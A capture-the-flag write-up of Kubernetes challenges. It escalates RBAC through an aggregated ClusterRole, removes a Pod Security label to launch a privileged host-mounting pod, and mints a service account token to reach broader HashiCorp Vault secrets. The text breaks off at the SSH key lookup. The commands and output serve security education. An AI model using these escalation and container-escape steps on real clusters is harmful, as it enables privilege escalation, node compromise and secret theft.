Introduction

As is tradition, another CNCF event means another ControlPlane CTF - this time at CloudNativeSecurityCon in Seattle. Let's have a stab at these three fresh new challenges :D

Unlike previous CTFs, I won't be on the scoreboard this time, as I wasn't in Seattle for the event. Instead, I playtested the challenges remotely on the day, before the CTF opened. To give an indication of timing: I spent about 1.5 hours solving all three challenges, not counting the time between challenges spent writing the writeups below.

Challenge 1 - Aggregation

SSHing into the first challenge, let’s see what our first objective is.

                    |    |    |
               )_)  )_)  )_)
              )___))___))___)
              )____)____)_____)
           _____|____|____|____\___
----------\                   /---------
  ^^^^^ ^^^^^^^^^^^^^^^^^^^^^
    ^^^^      ^^^     ^^^    ^^

                                       __/ \__
                                      /  o o  \
                                      |   o    |
                                      \  o o  /
                                       \_____/
                                        __/ \__
                                       /  o o  \
                                       |   o    |
                                       \  o o  /
                                        \_____/

Welcome, recruits, to Captain Hashjack's training range. The good cap'n has taken a break from sailing the high seas to train the next generation of fearsom bucaneers.

Here, he be teachin ye' some nuances of RBAC.

Honestly, theming these things gets tiring after a while. Have fun playing with some of the weirdnesses of RBAC. There's a flag in the default namespace and another on all of the nodes.

Interesting, looks like this will be some fun with RBAC. The first flag is presumably a secret in the default namespace, which will probably need some form of privilege escalation to reach, and then we'll need to compromise the underlying nodes for the rest.

As this seems to be RBAC privilege escalation from the description, let’s start with viewing our permissions.

root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl auth can-i --list
Resources                                       Non-Resource URLs                      Resource Names   Verbs
clusterroles.rbac.authorization.k8s.io          []                                     [heights]        [*]
clusterroles.rbac.authorization.k8s.io          []                                     [spiders]        [*]
clusterroles.rbac.authorization.k8s.io          []                                     [tight-spaces]   [*]
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
configmaps                                      []                                     []               [get list]
pods                                            []                                     []               [get list]
deployments.apps                                []                                     []               [get list]
*.rbac.authorization.k8s.io                     []                                     []               [get list]
                                                [/.well-known/openid-configuration/]   []               [get]
                                                [/.well-known/openid-configuration]    []               [get]
                                                [/api/*]                               []               [get]
                                                [/api]                                 []               [get]
                                                [/apis/*]                              []               [get]
                                                [/apis]                                []               [get]
                                                [/healthz]                             []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openapi]                             []               [get]
                                                [/openid/v1/jwks/]                     []               [get]
                                                [/openid/v1/jwks]                      []               [get]
                                                [/readyz]                              []               [get]
                                                [/readyz]                              []               [get]
                                                [/version/]                            []               [get]
                                                [/version/]                            []               [get]
                                                [/version]                             []               [get]
                                                [/version]                             []               [get]

So we have full permissions on the heights, spiders, and tight-spaces cluster roles. Because those permissions are granted with the * verb, they include the escalate verb, which lets us modify those roles to grant permissions we don't currently hold ourselves - a classic RBAC privilege escalation technique.
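
To double-check that assumption before relying on it, we can ask the API server directly whether we hold escalate on each role. A quick sketch in the same spirit as the automation later in this post - shelling out to kubectl from Python (untested here, but the escalate verb check is standard RBAC):

import subprocess

# The escalate verb is what allows adding permissions to a role that we don't hold ourselves
for role in ["heights", "spiders", "tight-spaces"]:
    result = subprocess.run(
        ["kubectl", "auth", "can-i", "escalate", f"clusterroles/{role}"],
        capture_output=True,
        text=True,
    )
    print(role, result.stdout.strip())

Assuming those come back as yes, let's check which of these roles actually applies to us: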

root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get rolebinding -o wide
NAME         ROLE              AGE   USERS   GROUPS   SERVICEACCOUNTS
entrypoint   ClusterRole/sum   25m                    default/entrypoint
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get clusterrole sum -o yaml
aggregationRule:
  clusterRoleSelectors:
  - matchLabels:
      rbac.example.com/aggregate-to-sum: "true"
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  annotations:
    flag: flag_ctf{the_source_of_my_power}
  creationTimestamp: "2024-06-27T14:40:23Z"
  name: sum
  resourceVersion: "602"
  uid: d649a1fc-5688-4112-9ad0-9d4ffa7cd3a0
rules:
- apiGroups:
  - ""
  resources:
  - configmaps
  verbs:
  - get
  - list
- apiGroups:
  - apps
  resources:
  - deployments
  verbs:
  - get
  - list
- apiGroups:
  - ""
  resources:
  - pods
  verbs:
  - get
  - list

Firstly, there's our first flag, sitting in an annotation on the cluster role. That wasn't in either of the places the intro message mentioned, which suggests where the remaining two are: one in the namespace's secrets, the other on the nodes.

Looking at the sum cluster role, which is bound to us through a role binding, it has an aggregation rule. This is where Kubernetes combines multiple cluster roles into one via a built-in controller: every cluster role matching the selector gets its rules merged into this one. I wonder if the three roles we can edit are the ones being aggregated.
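
Conceptually, the aggregation controller (part of kube-controller-manager) watches ClusterRoles, finds everything matching the selectors in the aggregationRule, and overwrites the parent role's rules with the union of the matching roles' rules. A rough sketch of that logic using the kubernetes Python client - purely illustrative, we don't need to run this:

from kubernetes import client, config

config.load_incluster_config()  # or load_kube_config() when running outside the cluster
rbac = client.RbacAuthorizationV1Api()

# Find every ClusterRole carrying the label from sum's aggregationRule selector
children = rbac.list_cluster_role(
    label_selector="rbac.example.com/aggregate-to-sum=true"
)

# The controller replaces sum's rules with the union of the matching roles' rules
merged_rules = []
for role in children.items:
    print(f"aggregating rules from {role.metadata.name}")
    merged_rules.extend(role.rules or [])

So any rule that lands in a ClusterRole carrying that label ends up in sum. Let's check whether the three roles we can edit do carry it: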

root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get clusterrole heights -o yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  creationTimestamp: "2024-06-27T14:40:23Z"
  labels:
    rbac.example.com/aggregate-to-sum: "true"
  name: heights
  resourceVersion: "599"
  uid: fb29209e-139f-4a78-add6-222ee7b7a009
rules:
- apiGroups:
  - ""
  resources:
  - configmaps
  verbs:
  - get
  - list
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get clusterrole spiders -o yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  creationTimestamp: "2024-06-27T14:40:23Z"
  labels:
    rbac.example.com/aggregate-to-sum: "true"
  name: spiders
  resourceVersion: "597"
  uid: 4add6f24-0858-406a-9246-9c1aeb643201
rules:
- apiGroups:
  - apps
  resources:
  - deployments
  verbs:
  - get
  - list
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get clusterrole tight-spaces -o yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  creationTimestamp: "2024-06-27T14:40:23Z"
  labels:
    rbac.example.com/aggregate-to-sum: "true"
  name: tight-spaces
  resourceVersion: "601"
  uid: 3c028783-a39e-4017-98de-7955b78958e4
rules:
- apiGroups:
  - ""
  resources:
  - pods
  verbs:
  - get
  - list

Yup, each of these is aggregated into the sum role. This can be seen from the rbac.example.com/aggregate-to-sum: "true" label, which matches the selector defined in sum's aggregation rule. That means we can modify any one of them and the change will propagate into sum, giving us full administrator permissions within the namespace. We can add the following rule to represent all permissions:

- apiGroups:
  - '*'
  resources:
  - '*'
  verbs:
  - '*'
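
One way to add it is kubectl edit, which I use below. If you'd rather script the step, an equivalent approach (hypothetical, not what I actually ran) is a JSON patch that appends the same rule:

import json
import subprocess

# Append a wildcard rule to one of the aggregated child roles
patch = [{
    "op": "add",
    "path": "/rules/-",
    "value": {"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]},
}]
subprocess.run(
    ["kubectl", "patch", "clusterrole", "tight-spaces", "--type=json", "-p", json.dumps(patch)],
    check=True,
)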

Adding this permission into tight-spaces:

root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl edit clusterrole tight-spaces
clusterrole.rbac.authorization.k8s.io/tight-spaces edited
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get clusterrole sum -o yaml
aggregationRule:
  clusterRoleSelectors:
  - matchLabels:
      rbac.example.com/aggregate-to-sum: "true"
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  annotations:
    flag: flag_ctf{the_source_of_my_power}
  creationTimestamp: "2024-06-27T14:40:23Z"
  name: sum
  resourceVersion: "3303"
  uid: d649a1fc-5688-4112-9ad0-9d4ffa7cd3a0
rules:
- apiGroups:
  - ""
  resources:
  - configmaps
  verbs:
  - get
  - list
- apiGroups:
  - apps
  resources:
  - deployments
  verbs:
  - get
  - list
- apiGroups:
  - ""
  resources:
  - pods
  verbs:
  - get
  - list
- apiGroups:
  - '*'
  resources:
  - '*'
  verbs:
  - '*'

Excellent, our addition now shows up at the bottom of the aggregated cluster role, so we should have full permissions within the namespace - including access to the secrets, where a flag is meant to be.

root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get secret
NAME   TYPE     DATA   AGE
flag   Opaque   1      27m
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get secret -o yaml
apiVersion: v1
items:
- apiVersion: v1
  data:
    flag: ZmxhZ19jdGZ7QWdncmVnYXRlX2lzX3VzZWRfaW5fbW9yZV90aGFuX2NvbmNyZXRlfQ==
  kind: Secret
  metadata:
    creationTimestamp: "2024-06-27T14:40:24Z"
    name: flag
    namespace: default
    resourceVersion: "605"
    uid: 486764aa-9036-4f55-aaba-22116f256772
  type: Opaque
kind: List
metadata:
  resourceVersion: ""
root@entrypoint-deployment-776cc5bd94-fw2tt:~# base64 -d <<< ZmxhZ19jdGZ7QWdncmVnYXRlX2lzX3VzZWRfaW5fbW9yZV90aGFuX2NvbmNyZXRlfQ==
flag_ctf{Aggregate_is_used_in_more_than_concrete}

That's the second flag; now we just need to get onto a node. We should be able to do that with a privileged pod.

root@entrypoint-deployment-776cc5bd94-fw2tt:~# vim deploy.yml
root@entrypoint-deployment-776cc5bd94-fw2tt:~# cat deploy.yml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: testing
spec:
  selector:
    matchLabels:
      name: testing
  template:
    metadata:
      labels:
        name: testing
    spec:
      tolerations:
      - key: node-role.kubernetes.io/master
        operator: Exists
        effect: NoSchedule
      hostNetwork: true
      hostPID: true
      containers:
      - name: testing
        image: skybound/net-utils
        imagePullPolicy: IfNotPresent
        args: ["sleep", "100d"]
        securityContext:
          privileged: true
        volumeMounts:
        - name: host
          mountPath: /host
      volumes:
      - name: host
        hostPath:
          path: /
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl apply -f deploy.yml
Warning: would violate PodSecurity "baseline:latest": host namespaces (hostNetwork=true, hostPID=true), hostPath volumes (volume "host"), privileged (container "testing" must not set securityContext.privileged=true)
deployment.apps/testing created
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get pods
NAME                                     READY   STATUS    RESTARTS   AGE
entrypoint-deployment-776cc5bd94-fw2tt   1/1     Running   0          31m
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get deployment
NAME                    READY   UP-TO-DATE   AVAILABLE   AGE
entrypoint-deployment   1/1     1            1           31m
testing                 0/1     0            0           8s
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get rs
NAME                               DESIRED   CURRENT   READY   AGE
entrypoint-deployment-776cc5bd94   1         1         1       31m
testing-7b95c8868                  1         0         0       13s

So we have a deployment and a ReplicaSet, but no pod. Let's see where the ReplicaSet is failing to create it.

root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl describe rs testing-7b95c8868
Name:           testing-7b95c8868
Namespace:      default
Selector:       name=testing,pod-template-hash=7b95c8868
Labels:         name=testing
                pod-template-hash=7b95c8868
Annotations:    deployment.kubernetes.io/desired-replicas: 1
                deployment.kubernetes.io/max-replicas: 2
                deployment.kubernetes.io/revision: 2
Controlled By:  Deployment/testing
Replicas:       0 current / 1 desired
Pods Status:    0 Running / 0 Waiting / 0 Succeeded / 0 Failed
Pod Template:
  Labels:  name=testing
           pod-template-hash=7b95c8868
  Containers:
   testing:
    Image:      skybound/net-utils
    Port:       <none>
    Host Port:  <none>
    Args:
      sleep
      100d
    Environment:  <none>
    Mounts:
      /host from host (rw)
  Volumes:
   host:
    Type:          HostPath (bare host directory volume)
    Path:          /
    HostPathType:
Conditions:
  Type             Status  Reason
  ----             ------  ------
  ReplicaFailure   True    FailedCreate
Events:
  Type     Reason        Age               From                   Message
  ----     ------        ----              ----                   -------
  [..SNIP..]
  Warning  FailedCreate  1s (x4 over 19s)  replicaset-controller  (combined from similar events): Error creating: pods "testing-7b95c8868-fkpsv" is forbidden: violates PodSecurity "baseline:latest": host namespaces (hostNetwork=true, hostPID=true), hostPath volumes (volume "host"), privileged (container "testing" must not set securityContext.privileged=true)

Right, so it looks like Pod Security Admission is enforcing the baseline standard on pods in this namespace, and this deployment definitely doesn't conform to it. Luckily, we have full admin within the namespace, so we can just change the namespace's labels to remove that restriction.

root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get ns default -o yaml
apiVersion: v1
kind: Namespace
metadata:
  creationTimestamp: "2024-06-27T14:39:50Z"
  labels:
    kubernetes.io/metadata.name: default
    pod-security.kubernetes.io/enforce: baseline
  name: default
  resourceVersion: "3864"
  uid: 4ea287ab-cb7f-4173-b21b-9ae3fd43e598
spec:
  finalizers:
  - kubernetes
status:
  phase: Active
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl edit ns default
namespace/default edited
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get ns default -o yaml
apiVersion: v1
kind: Namespace
metadata:
  creationTimestamp: "2024-06-27T14:39:50Z"
  labels:
    kubernetes.io/metadata.name: default
  name: default
  resourceVersion: "3864"
  uid: 4ea287ab-cb7f-4173-b21b-9ae3fd43e598
spec:
  finalizers:
  - kubernetes
status:
  phase: Active

We have removed the pod-security.kubernetes.io/enforce: baseline label, which tells Kubernetes which Pod Security Standard to enforce on this namespace. Without it, nothing is enforced, meaning we can deploy to our heart's content :D
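
For reference, the same change can be made non-interactively; a sketch of what that might look like (I used kubectl edit above, so this is illustrative rather than what was run):

import subprocess

# A trailing '-' on the label key tells kubectl to remove that label from the namespace
subprocess.run(
    ["kubectl", "label", "namespace", "default", "pod-security.kubernetes.io/enforce-"],
    check=True,
)

# The failed ReplicaSet will retry on its own eventually, but restarting the rollout is quicker
subprocess.run(["kubectl", "rollout", "restart", "deployment", "testing"], check=True)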

Re-deploying the deployment, and success - the pod is deployed. Let’s use it to get the final flag:

root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl exec -ti testing-7b95c8868-8xr9v -- bash
root@node-1:/# ls
bin  boot  dev	etc  home  host  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
root@node-1:/# cd host
root@node-1:/host# ls
bin  boot  dev	etc  home  lib	lib32  lib64  libx32  lost+found  media  mnt  opt  proc  root  run  sbin  snap	srv  swap-hibinit  sys	tmp  usr  var
root@node-1:/host# cd root/
root@node-1:/host/root# ls
flag.txt  snap
root@node-1:/host/root# cat flag.txt
flag_ctf{namespaces_arent_always_the_boundary_you_expect}

Nice, that was a good couple of RBAC techniques to get the flags.

Challenge 2 - Daylight Robbery

On to the second challenge:

Our targets are getting smarter, and started to keep their secrets in a vault instead of out in the open.

This is great, but we think we've found a way in. Leverage your initial access, and find those flags.

Interesting, this sounds like it involves HashiCorp Vault. Let's start by checking our permissions:

root@entrypoint-deployment-776cc5bd94-nncdz:~# ls
root@entrypoint-deployment-776cc5bd94-nncdz:~# kubectl auth can-i --list
Resources                                       Non-Resource URLs                      Resource Names   Verbs
serviceaccounts/token                           []                                     []               [create]
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
pods/exec                                       []                                     []               [get create list]
pods/log                                        []                                     []               [get create list]
pods                                            []                                     []               [get create list]
nodes                                           []                                     []               [get list]
                                                [/.well-known/openid-configuration/]   []               [get]
                                                [/.well-known/openid-configuration]    []               [get]
                                                [/api/*]                               []               [get]
                                                [/api]                                 []               [get]
                                                [/apis/*]                              []               [get]
                                                [/apis]                                []               [get]
                                                [/healthz]                             []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openapi]                             []               [get]
                                                [/openid/v1/jwks/]                     []               [get]
                                                [/openid/v1/jwks]                      []               [get]
                                                [/readyz]                              []               [get]
                                                [/readyz]                              []               [get]
                                                [/version/]                            []               [get]
                                                [/version/]                            []               [get]
                                                [/version]                             []               [get]
                                                [/version]                             []               [get]
serviceaccounts                                 []                                     []               [get]
services                                        []                                     []               [get]

So we can get (but not list - an important distinction, since get means we already need to know a resource's name) service accounts and services, we can create new service account tokens, we can get and list nodes, and we can list pods, read their logs, and exec into them.
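
The get-versus-list gap is easy to demonstrate with a quick sketch (shelling out to kubectl; the only service account name we know for certain right now is default):

import subprocess

# Listing service accounts needs the list verb, which we don't have
listing = subprocess.run(["kubectl", "get", "sa"], capture_output=True, text=True)
print(listing.stderr.strip())  # expect a Forbidden error

# Fetching one by name only needs get, so known or guessable names are still fair game
named = subprocess.run(["kubectl", "get", "sa", "default"], capture_output=True, text=True)
print(named.stdout.strip())

Anyway, the immediate starting point feels like the pods, so let's start playing with them and see what we learn: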

root@entrypoint-deployment-776cc5bd94-nncdz:~# kubectl logs production-workload-864c79df84-878wl
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.

Key                                       Value
---                                       -----
token                                     hvs.CAESIKSFW5jQD1cyabd3ExOdudaH5dsdi-SXP8qNikAQo8xHGh4KHGh2cy5SNlhIOU5KVVZMUmd5TlllclFUM1NzckU
token_accessor                            QDCcz7f4jcvEusClLJdAlxe4
token_duration                            24h
token_renewable                           true
token_policies                            ["app" "default"]
identity_policies                         []
policies                                  ["app" "default"]
token_meta_service_account_uid            e494f697-edcd-4640-9006-73a6dfbe52b2
token_meta_role                           app
token_meta_service_account_name           default
token_meta_service_account_namespace      default
token_meta_service_account_secret_name    n/a
root@entrypoint-deployment-776cc5bd94-nncdz:~# kubectl logs dev-workload-c4f5d5484-jn62c
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.

Key                                       Value
---                                       -----
token                                     hvs.CAESIEdLtLYXf--Yns37hi29gKmgzQHFWTud-Nf5pIg_ZDaLGh4KHGh2cy5yTHpZRTJsYk1BR2pMQTlOelhxZGRsaDk
token_accessor                            Hj0y9saGPEggle5g9RMmfQsN
token_duration                            23h59m59s
token_renewable                           true
token_policies                            ["app" "default"]
identity_policies                         []
policies                                  ["app" "default"]
token_meta_role                           app
token_meta_service_account_name           default
token_meta_service_account_namespace      default
token_meta_service_account_secret_name    n/a
token_meta_service_account_uid            e494f697-edcd-4640-9006-73a6dfbe52b2

Interesting - from the logs, each workload authenticates to Vault on startup, and we can see some details about the token it receives (the role, the policies, and the service account that was used). That may come in useful later, but nothing jumps out immediately, so let's inspect the containers a bit more.

root@entrypoint-deployment-776cc5bd94-nncdz:~# kubectl exec -ti production-workload-864c79df84-878wl -- sh
# ls -alp
total 12
drwxr-xr-x 2 root root 4096 Jun 27 15:18 ./
drwxr-xr-x 1 root root 4096 Jun 27 15:18 ../
-rw-r--r-- 1 root root  336 Jun 27 15:18 index.html
# cat index.html
==== Secret Path ====
secret/data/prod_key

======= Metadata =======
Key                Value
---                -----
created_time       2024-06-27T15:17:52.363865446Z
custom_metadata    <nil>
deletion_time      n/a
destroyed          false
version            1

=== Data ===
Key    Value
---    -----
key    Yep, this is the prod key
#
# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0   2800  1792 ?        Ss   15:18   0:00 /bin/sh /startup/entrypoint.sh
root          22  0.0  0.4  26556 19840 ?        S    15:18   0:00 python3 -m http.server
root          33  0.0  0.0   2800  1664 pts/0    Ss   15:42   0:00 sh
root          40  0.0  0.0   7888  3712 pts/0    R+   15:43   0:00 ps aux
# cat /startup/entrypoint.sh
#!/bin/sh
curl -s http://vault.vault.svc.cluster.local:8200/v1/auth/kubernetes/login -d "{\"role\":\"app\",\"jwt\":\"$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)\"}" | jq -r .auth.client_token | vault login -
vault kv get -mount=secret "$(echo $ENVIRONMENT)_key" > index.html
python3 -m http.server

It looks like index.html just contains information about the prod_key secret. It was fetched as part of the entrypoint script, which also confirms the container is already authenticated against the Vault server - the vault CLI in the pod has a usable token. Let's see what other secrets we can access from Vault:

# vault kv list -mount=secret /
Keys
----
dev_key
flag
flag2
prod_key
sshkey
# vault kv get -mount=secret flag
== Secret Path ==
secret/data/flag

======= Metadata =======
Key                Value
---                -----
created_time       2024-06-27T15:17:52.133436487Z
custom_metadata    <nil>
deletion_time      n/a
destroyed          false
version            1

==== Data ====
Key     Value
---     -----
flag    flag_ctf{all_your_secrets_are_belong_to_us}

There's the first flag. We do get permission denied trying to read flag2 or sshkey though, which pretty much sketches out the path forward: flag2 is the next step, and the sshkey we pick up along the way should let us SSH onto a node for the final flag.

# vault kv get -mount=secret flag2
Error reading secret/data/flag2: Error making API request.

URL: GET http://vault.vault.svc.cluster.local:8200/v1/secret/data/flag2
Code: 403. Errors:

* 1 error occurred:
	* permission denied
# vault kv get -mount=secret sshkey
Error reading secret/data/sshkey: Error making API request.

URL: GET http://vault.vault.svc.cluster.local:8200/v1/secret/data/sshkey
Code: 403. Errors:

* 1 error occurred:
	* permission denied

Vault permissions are defined via policies - I wonder if we can read those.

# vault policy list
app
default
readallthethings
root

Yes we do, excellent. Remembering the pod logs from earlier, the token we are currently authenticated with carries the app and default policies. Let's start with app, as that's probably where the challenge-specific permissions come from - it's not, well, default - and have a look at readallthethings while we're at it, since that's clearly not built-in either.

# vault policy read app
path "secret/*" {
  capabilities = ["read", "list"]
}

path "secret/data/flag2" {
  capabilities = ["deny"]
}

path "secret/data/sshkey" {
  capabilities = ["deny"]
}

path "sys/policies/*" {
  capabilities = ["read", "list"]
}

path "auth/kubernetes/role/*" {
  capabilities = ["read", "list"]
}

# vault policy read readallthethings
path "secret/*" {
  capabilities = ["read", "list"]
}

path "sys/policies/*" {
  capabilities = ["read", "list"]
}

path "auth/kubernetes/role/*" {
  capabilities = ["read", "list"]
}

OK, so we can see the explicit denies for flag2 and sshkey, but the app policy also lets us view information about the roles that can authenticate via Kubernetes. As a bit of background, Vault's Kubernetes auth method lets Kubernetes service accounts authenticate to Vault and maps them to Vault roles; it uses the claims in the service account JWT to check that the caller is allowed to use the role it is asking for. Also, looking at the readallthethings policy - again, not a built-in one - it has the same broad read access over secret/* but without the explicit denies, so ideally we want to end up in a position where that policy applies to us.
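
For context, the Kubernetes auth login itself is just an HTTP call: you post a role name plus a service account JWT, Vault validates the JWT against the cluster (via the TokenReview API by default) and checks the token's service account name and namespace against the role's bound values before issuing a Vault token. Roughly, mirroring the curl from entrypoint.sh - a sketch using requests, which is an assumption here:

import requests

VAULT_ADDR = "http://vault.vault.svc.cluster.local:8200"

# The pod's projected service account token
with open("/var/run/secrets/kubernetes.io/serviceaccount/token") as f:
    jwt = f.read()

# Vault checks the JWT's service account against the role's bound names and namespaces
resp = requests.post(
    f"{VAULT_ADDR}/v1/auth/kubernetes/login",
    json={"role": "app", "jwt": jwt},
)
print(resp.json()["auth"]["client_token"])

With that in mind, let's see which roles exist on the Kubernetes auth backend: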

# vault list auth/kubernetes/role
Keys
----
app
readallthethings

OK, so we are currently authenticated via the app role; let's see the details of the readallthethings role.

# vault read auth/kubernetes/role/readallthethings
Key                                         Value
---                                         -----
alias_name_source                           serviceaccount_uid
bound_service_account_names                 [vault-admin]
bound_service_account_namespace_selector    n/a
bound_service_account_namespaces            [default]
policies                                    [readallthethings]
token_bound_cidrs                           []
token_explicit_max_ttl                      0s
token_max_ttl                               0s
token_no_default_policy                     false
token_num_uses                              0
token_period                                0s
token_policies                              [readallthethings]
token_ttl                                   24h
token_type                                  default
ttl                                         24h

Simple enough: this role requires a token for the vault-admin service account in the default namespace - those are the claims Vault will check in the JWT. Luckily for us, we have the serviceaccounts/token create permission, so let's see if the vault-admin account exists. If it does, we can mint a token for it and re-authenticate.

root@entrypoint-deployment-776cc5bd94-nncdz:~# kubectl get sa vault-admin
NAME          SECRETS   AGE
vault-admin   0         33m
root@entrypoint-deployment-776cc5bd94-nncdz:~# kubectl create token vault-admin
eyJhbGciOiJSUzI1NiIsImtpZCI6IjlXM004YjJucWRUQmMyNkJoMFcwWUlfN1lIdWdiaENNSmRzdm5TVWc5NHMifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzE5NTA3MTAzLCJpYXQiOjE3MTk1MDM1MDMsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0Iiwic2VydmljZWFjY291bnQiOnsibmFtZSI6InZhdWx0LWFkbWluIiwidWlkIjoiODEyYTg3YzQtZDEzNi00YWJiLTkxM2MtY2I2Mjc5MGY4ODgyIn19LCJuYmYiOjE3MTk1MDM1MDMsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OnZhdWx0LWFkbWluIn0.LAcqu_oz6N4kGvkq8nvNv1iMNGtjE-qoXemC-ChlGD5_TLtdV1Fix8wIuVwXHehZEwqQZBU6vIj7OvSEA36xWmwFtJLW4zpznOyg3vlU5IMId0qmRKf7KOKhPKswFfW-_a-mJ0R3vZP3bLaN8_XRK5_hy4IjcYY1DO5c-FSTFlIxZNvJDwhnYWuYoZw_PPgC0nGW2nPiJAzXF48d4u-pSsI74Qx6wboLBndWPQK0WbXxOjSH3GGTHVfj5uUjHfgTSI9GQa6LsyugZKgec1GOqUbC_IU0BtzQhBJU0ew6EWpByopUjeDfmLuEYkAxtGVNOCAjgwG8FCW-xJ6-Lj-V-Q

Now, with a valid token for vault-admin, let's save it into a VAULT_SA environment variable back in the workload pod and re-authenticate with it:

# curl -s http://vault.vault.svc.cluster.local:8200/v1/auth/kubernetes/login -d "{\"role\":\"app\",\"jwt\":\"$(echo $VAULT_SA)\"}" | jq -r .auth.client_token | vault login -
Error authenticating: error looking up token: Error making API request.

URL: GET http://vault.vault.svc.cluster.local:8200/v1/auth/token/lookup-self
Code: 403. Errors:

* permission denied

Oops - forgot to change the role we want to authenticate as…

# curl -s http://vault.vault.svc.cluster.local:8200/v1/auth/kubernetes/login -d "{\"role\":\"readallthethings\",\"jwt\":\"$(echo $VAULT_SA)\"}" | jq -r .auth.client_token | vault login -
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.

Key                                       Value
---                                       -----
token                                     hvs.CAESIF5kB_18IYYzwBkKIz8AzH_uV2Y87Cqy6dpjWaEb6avrGh4KHGh2cy5PbVM5eFhRWTBOTWlqWXpFUVVsSHpJT24
token_accessor                            jgXlsHyFhZAh2705GzOQvRDC
token_duration                            23h59m59s
token_renewable                           true
token_policies                            ["default" "readallthethings"]
identity_policies                         []
policies                                  ["default" "readallthethings"]
token_meta_role                           readallthethings
token_meta_service_account_name           vault-admin
token_meta_service_account_namespace      default
token_meta_service_account_secret_name    n/a
token_meta_service_account_uid            812a87c4-d136-4abb-913c-cb62790f8882

We're in - we should now be able to read the second flag and the SSH key.

# vault kv get -mount=secret flag2
== Secret Path ==
secret/data/flag2

======= Metadata =======
Key                Value
---                -----
created_time       2024-06-27T15:17:52.829295757Z
custom_metadata    <nil>
deletion_time      n/a
destroyed          false
version            1

==== Data ====
Key     Value
---     -----
flag    flag_ctf{okay_now_its_all_the_secrets}

# vault kv get -mount=secret sshkey
=== Secret Path ===
secret/data/sshkey

======= Metadata =======
Key                Value
---                -----
created_time       2024-06-27T15:17:53.064203051Z
custom_metadata    <nil>
deletion_time      n/a
destroyed          false
version            1

====== Data ======
Key         Value
---         -----
